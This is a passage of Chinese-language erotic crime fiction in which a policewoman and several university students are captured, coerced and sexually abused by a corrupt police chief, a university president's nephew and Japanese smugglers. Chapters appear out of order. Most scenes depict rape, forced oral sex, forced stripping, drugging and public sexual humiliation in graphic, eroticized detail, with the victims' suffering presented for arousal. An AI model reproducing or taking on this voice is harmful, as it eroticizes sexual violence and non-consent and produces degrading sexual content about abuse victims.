      就在這時,門上響起了急切的敲門聲。

      陳茹開門,看見一個青年站在門口,正是李浩。

      “警官,求求你,救救我女朋友,沈科長他……他正在隔壁污辱她!”李浩道。

      陳茹沉下臉︰“你不可以亂說,怎么會有這種事!”

      “真的,求你了!審訊室里只有他們兩個!”李浩說。

      陳茹知道沈科長確實是個好色的家伙,這從他看自己的目光就可以知道,可是他居然會利用公職做違法的事?不過由男警察單獨給女性錄口供確實是不符規定,本著一個警察的職業道德,陳茹道︰“好,我去看看,如果情況不屬實,我告你誹謗!”

      陳茹關上門,來到了審訊二室,她用鑰匙打開門,李浩立刻發出了痛苦的叫聲,而陳茹則簡直不敢相信自己的眼睛。一個女孩被赤裸裸地雙腿分開,雙手反在身后地銬在椅子上,而沈科長則蹲在女孩裸露的胯間,將一根警棍插入到女孩的肛門里!

      陳茹憤怒地大喝一聲,走過去一腳將沈科長踢倒在地︰“畜生,你不配做人民警察!”

      李浩撲過去抱住再次被污辱了的肖揚,他滿腔悲憤地將深深插入肖揚屁眼的警棍拔了出來。

      “我殺了你!”李浩拿著棍子就要去揍沈科長,被陳茹攔住。

      “把手銬鑰匙交出來!”

      沈科長灰溜溜地交出鑰匙,老奸巨滑的他正在思考對策。陳茹接過鑰匙給肖揚打開手銬,可憐的肖揚的手腕、腳踝、膝蓋都分別銬住,陳茹給她一一打開。此時她和李浩的注意力都集中在肖揚身上,卻全沒注意到沈科長已經悄悄溜了出去。

      陳茹打開了肖揚的六個手銬,將散落地上的衣褲遞給肖揚,肖揚淚流滿面地穿上。

      就在這時,陳茹聽到了背后的風聲,她抬起長腿漂亮地一個后踢,只聽“哎喲”一聲,一個人摔了出去。聽到這個聲音,陳茹立刻覺察不妙,她以為是負隅頑抗的沈科長來偷襲,所以并不在意,因為她自信可以輕松對付一個中年的沈科長??墒莿偛拍锹暋鞍选眳s并非沈科長的聲音,她敏銳的聽覺告訴她,那是小林的聲音!她心念電閃,一定是沈科長去放出了小林和西村,那么小林被踢倒,一定還有西村,說不定沈科長也一起撲來。她開始后悔自己太輕敵,如果當時自己轉過身,就可以看見西村的位置,可是自己為了瀟灑,現在背對著強敵。

      盡管如此,作為一名優秀的警官,她還是迅速地朝西村最可能出現的地方踢了一腳。又是“哎喲”一聲,可是陳茹已經知道不妙。因為她知道這一腳只踢中了一個人的肩膀,那個人完全還具有立刻進攻的能力。

      其實,在背對對手的情況下,能夠看都不看就踢中對方,已經了不起了,可是還沒做到“很”了不起。也就是這一點微小的差距,卻導致了這位漂亮女警終身的屈辱。在她踢中的同時,一根繩套套住了她的脖子,迅速緊緊地掐住了她。那是西村。

      “小心……??!”李浩剛剛叫出就被沈科長用警棍擊昏,他將肖揚拖到隔壁銬起來,將李浩則以“襲擊警察”的罪名叫人關了起來。

      審訊室里,爬起來的小林立刻踢向陳茹的小腹,陳茹飛起一腳踢向小林的下頜,本來這一腳必能后發先至,可是西村一拉繩索,陳茹被迫人向后仰,沒有踢中,反而被小林捉住了腳踝,這樣一來她便高高地分開了雙腿,小林看準機會狠狠地一腳踢在了陳茹的胯間。

      胯間可是人最脆弱的地方??!陳茹一聲慘叫,幾乎立刻喪失了戰斗力。西村一緊繩索將她拉翻在地,然后將繩索的另一端綁在暖氣管上,這樣陳茹的頭便被吊在墻根,無法動彈了。小林此時又狠狠朝陳茹的胯間和小腹一頓猛踢,來報復陳茹剛才對他們的毒打。陳茹被踢的連連慘叫。西村則將剛才用來銬肖揚的手銬將陳茹的雙手也銬在暖氣管上。

      這樣,這個美麗高傲的女警終于被她的犯人制服了!

      陳茹綿軟無力,精疲力竭地被拷在那里,眼睜睜地看著西村和小林兩個混蛋淫笑著向她走來。她抬起美麗的眼睛,憤怒卻又無奈地盯著他們。

      看到這個令他們又怕又怒又喜歡的中國美麗女警終于成了他們的階下囚,西村和小林自然都興奮得不得了。陳茹追蹤了他們近三年,令他們整日提心吊膽,可是此刻這個機靈,聰明的女警官已經完全成了他們的獵物。

      此刻被綁在暖氣管上的陳茹對于他們來說,與其是那個讓他們恐懼得難以入睡、干練機智的女警官,不如說是一個二十四歲、貌美如花、有著令人想入非非的漂亮身材的美女。是的,被制服了的她已經不是警察,她是一個和別的他們以前玩弄過的女人一樣的女人而已。

      “怎么樣,陳警官?”西村帶著勝利的得意望著毫無反抗余地的陳茹道。

      “你們一定不會逃脫法網的!”陳茹憤怒地說。

      “陳警官生氣的樣子真迷人??!”西村色迷迷地說。

      “你敢碰我!我殺了你!”陳茹雖然被俘,但說話依然充滿了震懾力。

      長期對陳茹的恐懼令西村幾乎顫抖了一下,但他很快告訴自己眼前的陳茹已經沒有任何抵抗力。

      “西村,此處不宜久留,快麻醉了她把她轉移到安全的地方吧?!毙×终f著拿出一個針筒,里面有黃色的液體。

      “急什么!外面有沈科長照應著?!蔽鞔宓扩U“難得可以和陳警官單獨這么相處,不好好纏綿一下怎么成?”

      小林當然也對陳茹垂涎欲滴,聽西村這么說,也大起了膽子。

      “畜生,你們敢碰我!”陳茹罵道,拚命掙扎,可是脖子上的繩索和鋼銬緊緊地鎖住了她。

      “喲,好威嚴??!看來是有必要讓陳警官知道一下,你已經不是那個高傲的追捕我們的女警官了,而是我們的女俘虜!是不是?”西村微笑地看著陳茹。

      “你敢碰我一下,我決不會放過你的!”陳茹又拚命扭動了一下身體。

      這時沈科長進來道︰“局長開會回來了,你們快一點?!?br>
      “西村,先麻醉了她吧,以后可以慢慢玩弄她!”小林道。

      “好吧,”西村說︰“那么打針應該打在哪里最好???”他說完淫笑著望著小林。小林會意,也淫笑著說︰“當然是打在有洞的地方嘍!”說完兩人狂笑。沈科長也在旁邊陪著干笑,猛然瞥見陳茹憤怒的目光,他自知慚愧,退了出去。

      “畜生,你們想干什么!”陳茹看著逼近她的西村和小林嬌叱著,可是兩個日本色狼卻依然淫笑著逼過去。陳茹奮力用腳踢他們,可是她無法行動,很快便被小林和西村一人將一條長腿捉住。

      被捉住了最后反抗的武器的陳茹只有絕望地叫罵著︰“放開我,你們想干什么!放開我!”陳茹發瘋般地用盡最后的力氣用力擺動她被捉住的長腿,扭動纖腰,秀美的長發隨著她的頭拚命的擺動而散亂,可是這位漂亮的女警官還是只能眼睜睜地看著兩個她的犯人將手伸向她的腰際。

      “畜生,放開我!放開我!”在女警官絕望的叫喊聲中,她的緊身長褲和白色的小內褲被西村和小林粗暴地剝去。

      天??!高傲的女警官終于在她追捕的罪犯面前露出了她下體的陰毛和豐滿白晰的屁股以及兩條白晰修長的玉腿!羞憤欲死的陳茹筋疲力盡地軟倒,淚水不爭氣地涌出了眼眶。再頑強,她終究是個女人??!

      “畜生!放開我!”她用哭泣的聲音依然喊著。

      “哇,原來這就是中國第一美女警官的玉臀??!果然也是與眾不同的美麗!怎么樣,露了屁股的女警官!”西村將頭湊到陳茹耳邊說︰“還高傲嗎?還想抓我們嗎?唉,要是你死去的父親知道他的寶貝女兒不僅沒為他報仇,還在他的仇人面前光屁股,不知會怎樣?哈哈哈哈!”

      生性要強、高傲的陳茹怎堪忍受被人扒下了褲子還要這樣羞辱,只想立刻死了。她扭過頭去,淚流滿面。

      “還挺倔強嘛!”西村笑道。

      “這是陳警官第幾次在自己的要犯面前露屁股???”小林笑問。兩人一邊用言語污辱陳茹,一邊伸手摸弄陳茹的陰毛和屁股。陳茹只能拚命夾緊她的長腿,不讓他們伸手到她的胯間。

      西村和小林都是玩女人的老手,他們相視一笑,早已經心領神會,兩人各捉住陳茹的一只腳踝,將她的玉腿用力分開,然后高高地將她的腳踝用手銬銬在暖氣管上面的部分。這樣陳茹便仰面朝天地呈120度趴開了她的兩腿,腿間那條從沒讓男人看過,更別說是自己的犯人的肉縫還有屁眼都無可奈何地張了開來。

      “畜生!”被弄成如此羞恥姿勢的陳茹終于崩潰︰“你們殺了我吧!畜生,你們殺了我吧,不要這樣羞辱我!求求你們殺了我吧!”

      望著高傲神情盡去,羞恥得淚流滿面,苦苦哀求的陳茹,西村滿意地笑了。他拿起針筒,伸到陳茹那條張開的粉紅色肉縫間……

      在藥性發作之前,這位美麗的女警官早已因羞憤而昏了過去……

      第十回 警察局里奸雙美一代警花遭狂辱

      上海第二大學旁邊的一幢高層公寓的21樓2101房間門口。

      一個男孩看看四周,拿出一樣撬鎖工具撬入了房間。這個男孩是陳卓,他是到江龍在學校附近租的房子里找線索的。

      他翻遍了房間,沒有發現任何線索。最后,他打開了江龍的電腦。江龍的電腦被設置了開機密碼。陳卓拆開電腦機箱,將CMOS短接放電,然后進入了江龍的系統。

      電腦里都是一些無聊的游戲和黃色圖片。陳卓最后打開了江龍的FOXMAIL,希望能從他的電子郵件里找些線索。

      陳卓迅速瀏覽,沒發現什么。陳卓并不氣餒,他拿出一張工具軟盤,開始嘗試恢復硬盤上被刪除掉的文件。他終于發現了兩封被刪除的加密的E-mail,陳卓的手指快速地敲擊著鍵盤,開始解密……


      李浩從昏迷中醒來的時候,發現自己被手腳都銬在審訊室的墻上,他等自己疼痛的腦袋稍微清醒了一點后記起,自己是和肖揚一起來警局報案,結果肖揚被喪盡天良的沈科長污辱,然后來救他們的美麗的女警官被人偷襲,然后自己就被打昏了。

      他抬眼看一看四周,猛然發現一個俏麗的身影躺在地下,正是心愛的女友肖揚。而在她的旁邊,站著一個高大的男生,手里拿著一根警棍,正是他切齒仇恨的奸污了他的女友的江龍。

      “江龍,你放開我!”李浩怒吼,鐵銬被他掙扎得“喀拉喀拉”直響。

      “叫吧,這房間是隔音的?!苯埖靡獾卣f。

      這時,地上的肖揚悠悠醒來。

      “浩?!彼⒖虛湎虮绘i住的李浩,江龍粗暴地將她拉開。

      “不許碰她!”李浩大吼。江龍拿起警棍狠狠朝李浩小腹一陣猛打,打得李浩立刻發不出聲音來。

      “別打他!”肖揚撲過來擋在李浩身前,被江龍推倒在地。

      “你再過來我就打死他!”江龍說完又猛打李浩,李浩忍住沒有叫出聲,可是嘴角立刻流出血來。

      “求你別打他!”肖揚哀求,卻不敢再沖過去。

      “肖小姐,只要你聽我的話,我就不打他?!苯埿χf。

      “好,我聽你的話,求你別打他了!”肖揚哀求。

      “很好,那你現在把褲子脫了!”江龍道。

      “不,揚,不要??!”李浩嚎叫︰“江龍,你是畜生!??!”江龍用警棍又是一陣猛打,李浩狂吐一口血,幾乎昏倒。

      “求求你,別再打他了!”肖揚看見心愛的男友被打成這樣,心如刀絞。

      “那你脫褲子呀!”江龍說。

      “揚……不要啊,不要讓他羞辱你,別管我!”李浩用微弱的聲音說。

      江龍又舉起了警棍。

      “別……別……我脫?!毙P含著淚說。

      “不!”李浩絕望地喊。

      肖揚緩緩將她的緊身上衣、牛仔褲、胸罩、內褲一件件地脫了下來。

      “哈哈哈哈!害什么羞,又不是沒讓我看過?!苯埖靡獾匦?。

      “江龍……你……你是畜生!”李浩憤怒得眼睛都要噴出火來。

      “怎么樣,知道跟我斗的下場了吧?”江龍湊近李浩得意地說︰“怎么樣,眼睜睜看著自己女友在自己的仇人面前裸體是什么滋味???”

      此時肖揚已經脫光了自己所有的衣褲,赤條條站在那里。江龍走過去,用警棍撥弄肖揚豐滿的乳房,一邊得意地看著李浩。

      “畜生!”李浩大叫一聲昏了過去。


      刑偵科寬敞的辦公室里,和煦的陽光照射在地毯上。

      沈科長正趴著腿坐在沙發上,他的臉上呈現出奇爽的表情,因為一個赤身裸體、修長美麗的少女正跪在他的面前,用小嘴吞吐著他的陽具。

      這個少女正是梁婉儀。

      “啊……啊……”沈科長突然一聲狂叫,將精液射入了梁婉儀的嘴里,梁婉儀將精液全部喝下,依然跪在那里道︰“沈科長,請你放了我父親吧!”

      此時的梁婉儀已經完全沒有了以往高傲的神情,她還有什么值得高傲的呢?她已經心灰意冷了。她在江龍面前表演過手淫、她被學校里最惡的三個流氓輪奸過、她被其中的阿流奪走了神圣的處女貞操、她替其中的傻胖子口交、她被其中的宋狗肛交,被他們三人肆意玩弄……而眼前這個五十幾歲的令她惡心的沈科長也強奸過她!再替他口交又算得了什么呢?

      “你放心,梁小姐,我會放了你的?!鄙蚩崎L淫笑著說道︰“只要你讓我滿意!”

      “說吧,你還想怎么玩我?”梁婉儀冷冷道。

      “嘿嘿!我三年前看到梁小姐拍的廣告后就喜歡上了梁小姐?,F在請梁小姐赤身裸體地在我面前表演一下這個廣告吧,還要說我要你說的臺詞!”沈科長說完淫笑著遞給梁婉儀一張紙。

      梁婉儀接過紙頭,冷冷地看了一遍,“好吧?!彼f。在江龍那里所受的污辱已經使她習慣這種性幻想的羞辱方式了。她估計,沈科長三年來就是根據她的廣告進行性幻想的。

      沈科長見梁婉儀答應,興奮不已。

      只見赤裸著嬌軀的梁婉儀婷婷地站在那里,然后原地轉了一個圈,做了一個漂亮的舞蹈動作,兩個豐乳上下抖動。然后說道︰“陽光,春風,雨露,生就了我天生的麗質,使我擁有了柔嫩的肌膚和豐滿的乳房,還有誘人的小穴?!绷和駜x說著單腿高踢,裸露出她的已經被數個男人插入過的肉縫,“可是柔嫩的肌膚還需要保養,我的保養方法是每天讓沈伯伯舔我的乳房,讓沈伯伯的大棒棒插入我的小穴……所有愛美的少女們,讓我們都讓沈伯伯來搞我們吧!”梁婉儀念完沈科長寫的變態臺詞后,背對沈科長跪下,然后高高翹起豐臀,將屁眼和肉縫都張了開來……

      這是沈科長進行了三年的性幻想,沒想到今天由幻想中的青春少女親自表演給他看,沈科長興奮得竟然又射了一次精……


      李浩再一次醒來的時候,沒睜開眼睛,就聽見江龍“啊啊”的呻吟聲,他睜開眼睛,看見江龍正站在他面前,赤條條的肖揚跪在他面前,小手握住他的陰莖根處,小嘴正含住他的龜頭舔舐。

      “江龍,我殺了你,我殺了你!揚,不要,不要??!”李浩狂吼。

      肖揚流著淚,替江龍口交著,她有什么辦法??!她想她反正已經被江龍這個惡少污辱過了,此刻為了救心愛的男友,只能再讓他羞辱了。

      “李浩,你女朋友的小舌頭真熱??!爽死我了!”江龍得意地看著李浩。

      “江龍,你會遭報應的,我會殺了你的!”李浩拚命地掙扎,卻無法掙脫鐵銬。眼睜睜看著江龍一陣痙攣,肖揚“咕咚咕咚”地喝下了江龍的精液,李浩再次昏了過去。


      梁婉儀跪在那里,豐臀高翹,羞辱感穿過她的麻木,又襲上心頭,她竭力忍住。突然她感到兩只腳踝被沈科長捉住,然后她被猛地倒拎起雙腿,分開銬在兩只文件柜的把手上,羞處毫無保留地裸露出來。

      “你……想干什么?”梁婉儀不知這個下流的老色狼又要怎么折磨自己。

      “你馬上就知道了!”沈科長淫笑著說。

      不一會兒,梁婉儀感到一樣鋒利的東西摩擦著自己的陰部,原來老色狼在剃她的陰毛??!

      李浩再次醒來的時候,又看見了令他氣炸肺的景像。他美麗心愛的女友赤裸裸分著腿躺在地上,江龍蹲在她胯間正在剃她的陰毛!

      可憐上二大兩位令所有男生著迷的美少女,竟然同時在被別人剃陰毛!

      李浩已經沒有力氣嚎叫,他只是痛苦地看著,看著……


      當江龍將肖揚的下體剃得干干凈凈的時候,門開了。李浩和肖揚看見沈科長領著一個裸體美少女走了進來,正是梁婉儀。沈科長和進來相視一陣惡笑,而兩位一絲不掛的美女只有凄楚地對望著。

      “好了,上二大最美的兩個美女都在這了,我們讓她們出個什么節目呢?”江龍和沈科長同時爆發出狂笑……

      與此同時。

      上海市浦東的一幢著名日資大樓的頂樓的貴賓室里。

      大約有四、五十名各色人士聚集在那里。這些人形形色色,卻有一個共同的特點,他們都是不法份子。

      他們,有上海黑社會的頭目們、有北方黑社會特地趕來的代表、有國內的走私集團的成員、還有日本的走私進口商。這些人中有些有犯罪業務往來,而大多數卻素昧平生,可是有一個共同點把他們聯系在了一起。

      他們全部都被陳茹女警官抓入過監獄,或者曾經被她追捕的狼狽不堪,或者因為她對走私的有力打擊而損失慘重。

      這個巨大的貴賓室的一角,山本、西村和小林正在和幾個日本人交談著。其中一個道︰“山本先生,你們真了不起,終于把這個多次壞我們的事的女警察給活捉了!”

      另一個道︰“聽說這個女警察非常漂亮,我真等不及想看一看??!”

      大廳里其他人也三三兩兩地議論紛紛。

      “山本不是在吹牛吧?他真的能活捉陳茹這個妞?”

      “就是,這個小妞真是利害??!”

      “雖然利害,不過人卻可真是漂亮啊,腿又那么性感,屁股那么翹,真撩人??!”

      “他媽的,這個臭妞害得我蹲了三年監獄,要是真活捉了她,嘿嘿!看我怎么搞她……”

      “這三個日本人這么淫蕩,又都恨她入骨,要是這妞真的被他們活捉,恐怕早被他們搞得一塌糊涂了?!?br>
      “對了,山本不是說今天有許多節目嗎?真等不及了?!?br>
      “嘿嘿,陳茹這么高傲的女警察,今天被她這么多犯人玩弄,不知會氣成什么樣子呢?”

      山本看見人都到了差不多了,便向西村和小林一使眼色,兩人便走進旁邊一間房間,他自己便走到房間的一個主席臺上。

      “靜一靜?!边@個中國通用標準的中文說︰“請靜一下?!?br>
      房間里立刻安靜下來。

      “今天請各位來,是為了共度一個節日,”他說︰“為了慶祝這個節日,我們榮幸地請來了一個我們共同的朋友一起來參加。她是°°中國最漂亮的警花陳茹警官!”此話一出,下面頓時再度騷動起來。

      與此同時,邊上的一扇門打開了。西村手中拿著一根粗麻繩,牽著一個赤身裸體的修長女子走了出來,正是那天在公安局里被西村他們捉住的陳茹!可憐昔日在這些惡棍們面前威風凜凜的美麗女警此刻一絲不掛,脖子上被像狗一樣牽著繩索拉了出來。她全身被用粗麻繩捆了個結結實實,漂亮高聳的乳房被麻繩呈8字型地捆著,腳踝上銬著腳鐐,只能讓她勉強走動。

      下面立刻興奮地議論起來︰“天??!真的是她,真的是這個臭妞!”

      “你看呀,她也有今天!她也會被捉??!”

      “山本的本事真大,竟然真的捉住她了,我們老大若地下有知,也該含笑九泉了!”

      “嘿,你看她那對奶子,多豐滿!”

      “我操,我早就知道這妞漂亮,以前怕得不敢看,嘿嘿!你看那屁股,咦?她屁股里還插著東西呢!”

      此時陳茹被拉到主席臺上,所有人都可以看得清清楚楚。她的屁眼里被插了一根粗大的塑料淫具??!塑料淫具隨著她走動時屁股的扭動而擺來擺去。

      “現在,請我們尊貴的客人,給我們講幾句話!”山本得意地說。

      “畜生!放開我!你們殺了我吧!畜生,你們不會有好結果的……放開我!放開我……”陳茹羞憤地在臺上叫著,乳房和屁眼里的淫具激烈地抖動著。


      陳卓歡呼一聲,終于解開了密碼,陳卓連忙去看第一封信,只見上面寫道︰

      定于×月×日在××大樓召開奸淫美麗女警陳茹的大會,歡迎江先生參加!請閱后立刻刪除,注意保密!

      落款是山本一郎。

      ×月×日,不就是今天嗎?陳卓一驚,必須立刻向警方報告!

      他再看第二封,這是江龍的回復︰

      感謝山本先生盛情邀請,不過我和這位女警并無什么過節。另外那天我也已經安排了有趣的節目,我和沈科長將一起享受上二大雙美!

      “上二大雙美”!難道是婉儀和肖揚?“婉儀!”陳卓大叫一聲!


      “第一個節目,警花浣腸!”西村宣布道。

      西村和小林將陳茹屁股高翹,按得跪倒在地,將肛門里的南傍國拔出,然后拿出一個浣腸器,插進了陳茹的屁眼。

      “??!~~”陳茹慘叫。

      臺下的人無不興奮地狂吼。

      就在此時,貴賓室門被踢開,百余名警察沖了進來,全國五十幾名最大惡極的罪犯和山本國際犯罪集團全部落網!


      “不可以!這不可以!”梁婉儀羞澀地說。

      “那你別想救你老爸了!”沈科長說。

      江龍走過去,拉開李浩褲子的拉鏈,用警棍將李浩的陰莖挑出來。

      “江龍,你是禽獸!婉儀,不要!”李浩大叫。

      “他媽的,我讓你爽,你還罵我?”江龍笑說︰“梁婉儀,吃吧!”

      “江龍,你不得好死的!”梁婉儀悲憤地說。她緩緩跪到李浩面前,含住了他的陰莖。

      “不要啊,婉儀!”李浩哀叫??墒潜涣和駜x這么美的少女口交,他立刻迅猛地勃起了,他雖然有肖揚這么美的女朋友,可是說他對梁婉儀沒有欲望,那絕對是假的,他于是忍不住呻吟起來。

      肖揚看著自己的好友替自己男朋友口交,自己的男朋友爽得直叫,真不知道是該哭還是笑。

      “你也別閑著,去摸你好朋友的乳房!”江龍命令肖揚。

      肖揚無奈,只有垂著淚,走到梁婉儀身后,伸手去摸婉儀的乳房。梁婉儀畢竟是個少女,被肖揚一摸乳頭,無奈地感受到了快感,于是賣力地吮吸李浩的陰莖,李浩終于大聲呻吟起來……

      “很好,”江龍滿足地說︰“現在,你們都按我寫給你們的臺詞說吧!”

      梁婉儀吐出李浩的陰莖,開始用舌頭舔他的陰囊,一邊說︰“浩哥哥,你這么大的雞巴,不要老是讓肖揚姐姐爽嘛,讓我也爽一爽吧!”

      “婉儀妹妹,其實我早就偷偷看上你了,恨不得插得你嗷嗷叫呢!”李浩怕江龍再傷害肖揚,只有按他說的說道。

      “那我們姐妹倆從今以后就一起伺候你吧!”肖揚一邊說,一邊將另一只手伸到梁婉儀的屁股下面摸她的陰戶,梁婉儀興奮地也把手伸到后面摸弄肖揚的下體。

      “浩哥哥,你說我們姐妹倆誰的乳房大?”婉儀說。

      “浩哥哥,你說我們誰的屁股豐滿?”肖揚說。

      “都大,啊……啊……都豐滿!”李浩終于爽叫一聲,將精液射入梁婉儀口中。

      江龍和沈科長微笑著坐著欣賞。

      這時門被踢開,局長親自帶人沖了進來,沈科長和江龍的手上終于被帶上了手銬!陳卓撲過去抱住了婉儀。

      江龍被帶走的時候,對著婉儀、肖揚、李浩、陳卓說道︰“不要以為你們勝利了,你們沒有!我在你們身上種下的恥辱,你們永遠不能洗刷掉!”

      第一回 惡少江龍

      上海第二大學的學生社團中心。晚上九點半。

      三樓的“野人”酒吧里,坐著大約幾十個各院系的學生。這里是學校最受歡迎的酒吧之一,來這里的學生以一對對的情侶居多,當然也有許多單身的男生來這里碰運氣。而今天,他們確實飽了眼福。

      男生們偷偷摸摸或是大膽的色迷迷的目光,都集中到了酒吧最里面的一個角落,那里坐著兩男兩女。

      兩個女孩子是外文系的肖揚和梁婉儀,都是學校里男生BBS上選出的“上二大四大美女”之一。兩人都讀大二,且非常要好。兩個女孩的個頭也差不多,都是1米68左右的高挑身材,有著非常修長迷人的美腿。

      梁婉儀今天穿著短裙,白晰勻稱而曲線優美的長腿露在外面,令酒吧里的男生都情不自禁要多看兩眼。而肖揚則穿著緊身的牛仔褲,緊緊包裹著她的長腿和豐滿微翹的屁股。

      坐在她們身旁的男孩,一個是現在讀大三的法學院的學生會主席李浩,是肖揚的男朋友(他自然令別的男生妒忌得發狂);另一個是梁婉儀的高中同學,日文系的李柯,同高大英俊的李浩相比,他顯得有點猥瑣。

      “你真的答應同江龍比試?”李柯道。

      李浩點點頭。

      “浩,他是校長的侄子呀?!毙P充滿關切地望著李浩。

      “我知道,”李浩握住肖揚的纖纖小手︰“就是因為他仗著是校長的侄子而為所欲為,才應該壓壓他囂張的氣焰?!?br>
      “不過這小子也是不像話,才大一就這么狂!”李柯道。

      “我支持你?!绷和駜x優雅地交疊著兩腿,喝了口橙汁道︰“有什么了不起的,教訓教訓他!”

      “你看,有梁大千金小姐替我撐腰,你還擔心什么?”李浩笑著說。

      梁婉儀的父親梁益民是日本昌永財團在上海的中方總經理,這在學校里也早不是秘密,因為梁婉儀在高中的時候就替昌永財團的雅柔系列護膚品做過上海的形象代言人,她靚麗純美的形像已經幾乎成為了每個男市民的心中偶像了。

      肖揚依然是顯得很擔憂的樣子。

      就在這時候,一個穿得很酷的高大男孩走進了“野人”酒吧。酒吧里的學生立刻議論紛紛起來,因為進來的男孩就是“校長的侄子”°°現在新聞學院讀大一的江龍。

      江龍的身后跟著兩個打手模樣的人,這兩個人從初中開始就跟著江龍,他們沒考取高中,全靠江龍替他們安排工作,現在索性什么都不干,就跟著江龍,做他的死黨。

      江龍霸道地揀了個位子坐下,要了三杯飲料。他眼光色迷迷地掃了掃周圍的女生,很快便看見了角落里的肖揚、梁婉儀和李浩。江龍立刻吹了一聲很響的口哨,站起來朝他們走去,李浩也站了起來。

      酒吧立刻騷動起來,因為江龍同李浩約定在本周日單挑籃球的事早已經傳遍了全校。不僅因為李浩一直是上二大的籃球明星,更因為許多人看不慣飛揚跋扈的江龍,都希望李浩為大家出口氣。

      “希望到時候你不會嚇得不敢來??!”江龍虛假地大笑著說。

      “小子,不會讓你失望的!”李浩冷冷道。

      江龍眼睛從上到下地盯著肖揚色迷迷地看了一番,道︰“肖揚小姐長得可真迷人??!”

      “這與你無關?!崩詈拼舐暤?。

      江龍大笑起來︰“別激動,周日見!”說完帶著兩個打手離開了酒吧。

      李浩他們復又坐下。

      “真不是個東西!”梁婉儀道。

      “禮拜天有他好看的!”李浩輕蔑地說。

      四個人又說了一會兒話,肖揚起身去上洗手間。酒吧里的男生都目送肖揚邁著修長的雙腿翩翩地走出酒吧。李浩沒有覺得有什么不妥,而這后來被證明是極其錯誤的。

      第二回 強奸對手美麗的女友

      洗手間在走廊的另一頭,肖揚走過迪斯高舞廳和臺球房,就在她走到電梯門口的時候,電梯的門打開了。肖揚沒有去注意電梯里是誰,可是電梯里卻突然伸出一只粗大的手抓住肖揚的手臂,將她一把拉進了電梯。

      肖揚驚叫了一聲,但是卻被迪斯高舞廳里傳出的震耳欲聾的音樂淹沒了,李浩根本不可能聽見。

      肖揚被拉進電梯,立刻被一只手粗暴地摀住了嘴,然后一把冰涼的刀子架在了她白晰纖細的脖子上。肖揚從來沒有碰到這種事,嚇得花容失色,她看見除了制住自己的人外,另外還有一個人,那人按下了去七樓的按鈕。那是小電影廳,現在早已經結束了放映,應該沒有任何人了。

      學校的電梯里沒有裝監視器,兩個歹徒又有刀,肖揚真的不知道應該怎么辦才好,她只有拚命地盯著其中的一個歹徒看,希望能認出他或是記住他的樣子。這一看頓時讓肖揚充滿了涼意,因為她認出來,那個歹徒就是剛才跟在江龍身后的打手!難道是被江龍劫持了?

      電梯停在七樓,那里果然沒有人,兩個人架著肖揚將她押入放映廳里。穿過空無一人的一排排座位,肖揚被押進了放映機房里,機房里,一個男孩微笑地坐在那里,不是江龍又是誰。

      “歡迎肖揚小姐!”江龍色迷迷地看著因慌亂羞澀而更顯嬌俏的肖揚。

      “你……想干什么!”肖揚盡量裝出鎮定的樣子。

      “你說我想干什么呢?”江龍又發出了令人討厭的笑聲︰“李浩這個家伙很有種,居然想跟我斗,我很喜歡?!苯埪N起二郎腿繼續道︰“我就喜歡和人斗的感覺,喜歡戰勝對手的感覺,喜歡羞辱對手的感覺?!?br>
      “你最好馬上放了我,這里是學校,你別亂來!”肖揚微微顫抖地說。

      江龍并不理睬她,繼續說︰“李浩是個難得的對手,所以我要好好跟他斗一斗,慢慢折磨他、羞辱他。肖揚小姐,你說要是我搞了他的漂亮心愛的女朋友,他會氣成什么樣子?”

      “畜生,你太放肆了!”肖揚拚命掙扎,卻哪是江龍兩個膀大腰圓的打手的對手。江龍大笑著站起來,走到肖揚面前,伸手去摸她高聳的胸部。

      “別碰我!”肖揚嬌叱,無奈兩手被人制住,江龍的手隔著衣服一把捏住了她的乳房。肖揚又羞又憤,她知道被自己男朋友的對手污辱會令江龍有多大的快感,又會令李浩多么恥辱和痛苦,所以嬌弱的她使盡了力氣掙扎??墒遣还芩趺磁铀膵绍|,江龍的手依然自如地摸弄她的乳房。

      肖揚羞澀難當,抬起修長的玉腿朝江龍蹬去,江龍早已經料到,側身一閃,然后伸手捉住了肖揚纖細的腳踝,他手使勁向上一舉,肖揚便被迫高高地抬起了她的一條長腿。像肖揚這樣溫柔的少女,雖然是憤怒地攻擊卻也是優雅得無力,此刻被江龍輕松地捏住腳踝高分著玉腿,更加顯得嬌美動人。

      “放開我!”肖揚漲紅了臉,掙扎著擺動她的長腿。

      江龍滿足地看著肖揚掙扎了一會兒,然后他放下了肖揚的腿,欺近肖揚的身前,這樣肖揚便無法使力踢他。江龍伸手到肖揚的纖腰去解她的皮帶。

      “不要,求你了,不要!”意識到掙扎不過三個男人的肖揚終于開口哀求。

      江龍當然不會停手,他熟練地解開皮帶,然后一下子將肖揚的緊身牛仔褲和白色的小巧內褲一齊剝到了腳踝處。頓時,一雙光滑白晰、曲線優美的長腿便裸露在了江龍的面前。

      “畜生!”肖揚絕望的嬌叫,拚命夾緊兩腿。

      江龍欣賞著肖揚的美腿和下腹部的一撮黑色的恥毛,“太美了!”江龍贊嘆道︰“真不愧是我們學校的四美之一??!”

      “不要……求求你!”肖揚哀求。

      “我見過那小子打球,”李浩對李柯說︰“他動作很花,可是并不實用。星期天一定打得那小子討饒?!崩詈谱鰤粢矝]有想到,此刻他嬌美可愛的女朋友卻正在向他的對手討饒。

      “唰唰”幾下,江龍的手下便將肖揚的衣褲全部剝去,美女肖揚終于赤身裸體!

      “畜生!救命??!浩,救我!”肖揚哀叫掙扎。

      江龍使個眼色,他手下放開了肖揚,掙脫了的肖揚下意識地向門口逃去,才發現自己一絲不掛。原來淫棍江龍就是想欣賞修長的肖揚裸體奔逃的美妙景像,肖揚的雙腿又長,屁股又翹翹的,哪怕是奔逃起來也是優雅無比,更何況她還羞澀地刻意夾緊玉腿,更顯得撩人。

      肖揚跑到門口,門當然鎖住。她絕望地看著江龍逼來。

      “江龍,你會后悔的!”肖揚哀叫。

      “打籃球其實最重要的是跑動,要積極地跑動……”李浩向李柯解釋。

      “畜生!”美麗的肖揚絕望地在放映室狹小的空間里“積極”地跑動,躲避著故意不捉住她的惡少江龍??墒菄樀没ㄈ菔男P并沒想到,她這樣裸露著迷人的玉體在江龍面前奔逃,其實令江龍得到更大的快感。

      江龍滿意地看著學校里出了名的長腿美眉肖揚裸露著修長玉腿奔逃著,豐滿的胸部隨著身體的起伏而撩人地晃動。

      玩夠了以后,江龍叫手下捉住肖揚。

      “放開我,你這個混蛋!”被重新捉住的肖揚嬌叱。

      “肖揚小姐,現在,就讓我來欣賞一下李浩同學那嬌美無比的女朋友的身體吧!”江龍淫笑說。

      “你敢!”肖揚夾緊了玉腿。

